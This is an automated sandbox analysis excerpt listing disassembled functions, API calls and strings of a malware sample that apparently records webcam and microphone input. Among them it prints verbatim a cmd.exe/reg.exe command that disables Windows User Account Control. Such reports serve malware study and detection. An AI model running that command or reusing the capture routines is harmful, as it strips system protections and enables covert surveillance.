                            • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                            • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                            APIs
                            • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                            • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                            • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                            • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: MetricsSystem
                            • String ID: ]tA
                            • API String ID: 4116985748-3517819141
                            • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                            • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                            • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                            • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                            APIs
                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                            Strings
                            • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreateProcess
                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                            • API String ID: 2922976086-4183131282
                            • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                            • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                            • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                            • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                            • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                            • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                            • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                            • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            Strings
                            • Connection KeepAlive | Disabled, xrefs: 004050D9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                            • String ID: Connection KeepAlive | Disabled
                            • API String ID: 2993684571-3818284553
                            • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                            • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                            • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                            • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                            APIs
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                            • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                            • Sleep.KERNEL32(00002710), ref: 00418DBD
                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: PlaySound$HandleLocalModuleSleepTime
                            • String ID: Alarm triggered
                            • API String ID: 614609389-2816303416
                            • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                            • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                            • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                            • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                            • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                            • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                            • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                            APIs
                            • Sleep.KERNEL32(00000000,?), ref: 004044A4
                              • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologSleep
                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                            • API String ID: 3469354165-3547787478
                            • Opcode ID: 2596316b9bbcd228594034146af270f3e01bd3c3610974548e797489da08f636
                            • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                            • Opcode Fuzzy Hash: 2596316b9bbcd228594034146af270f3e01bd3c3610974548e797489da08f636
                            • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                            APIs
                              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                            • _free.LIBCMT ref: 00442318
                            • _free.LIBCMT ref: 0044232F
                            • _free.LIBCMT ref: 0044234E
                            • _free.LIBCMT ref: 00442369
                            • _free.LIBCMT ref: 00442380
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$AllocateHeap
                            • String ID:
                            • API String ID: 3033488037-0
                            • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                            • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                            • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                            • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                            • _free.LIBCMT ref: 004468EC
                              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                            • _free.LIBCMT ref: 00446AB8
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                            • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                            • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                            • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                            • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                            • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                            • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                            • __alloca_probe_16.LIBCMT ref: 0044E391
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                            • __freea.LIBCMT ref: 0044E3FD
                              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                            • String ID:
                            • API String ID: 313313983-0
                            • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                            • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                            • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                            • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                            APIs
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                            • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                            • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                            • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                            • waveInStart.WINMM ref: 00401CDE
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                            • String ID:
                            • API String ID: 1356121797-0
                            • Opcode ID: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                            • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                            • Opcode Fuzzy Hash: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                            • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                            • _free.LIBCMT ref: 0044C59F
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                            • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                            • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                            • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                            APIs
                            • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                            • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreatePointerWrite
                            • String ID:
                            • API String ID: 1852769593-0
                            • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                            • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                            • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                            • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                            • int.LIBCPMT ref: 0040FBE8
                              • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                              • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                            • std::_Facet_Register.LIBCPMT ref: 0040FC28
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID:
                            • API String ID: 2536120697-0
                            • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                            • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                            • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                            • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                            APIs
                            • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                            • _free.LIBCMT ref: 004457E3
                            • _free.LIBCMT ref: 0044580A
                            • SetLastError.KERNEL32(00000000), ref: 00445817
                            • SetLastError.KERNEL32(00000000), ref: 00445820
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                            • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                            • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                            • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                            APIs
                            • _free.LIBCMT ref: 0044DBB4
                              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                            • _free.LIBCMT ref: 0044DBC6
                            • _free.LIBCMT ref: 0044DBD8
                            • _free.LIBCMT ref: 0044DBEA
                            • _free.LIBCMT ref: 0044DBFC
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                            • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                            • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                            • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                            APIs
                            • _free.LIBCMT ref: 00441566
                              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                            • _free.LIBCMT ref: 00441578
                            • _free.LIBCMT ref: 0044158B
                            • _free.LIBCMT ref: 0044159C
                            • _free.LIBCMT ref: 004415AD
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                            • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                            • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                            • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                            APIs
                            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Enum$InfoQueryValue
                            • String ID: [regsplt]
                            • API String ID: 3554306468-4262303796
                            • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                            • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                            • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                            • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                            APIs
                            • _strpbrk.LIBCMT ref: 0044B918
                            • _free.LIBCMT ref: 0044BA35
                              • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                              • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                              • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                            • String ID: *?$.
                            • API String ID: 2812119850-3972193922
                            • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                            • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                            • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                            • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alloca_probe_16__freea
                            • String ID: H"G$H"GH"G
                            • API String ID: 1635606685-3036711414
                            • Opcode ID: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                            • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                            • Opcode Fuzzy Hash: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                            • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040189E
                            • ExitThread.KERNEL32 ref: 004018D6
                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                            • String ID: 8:G
                            • API String ID: 1649129571-405301104
                            • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                            • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                            • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                            • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\xjXWSRbLn.exe,00000104), ref: 00440975
                            • _free.LIBCMT ref: 00440A40
                            • _free.LIBCMT ref: 00440A4A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
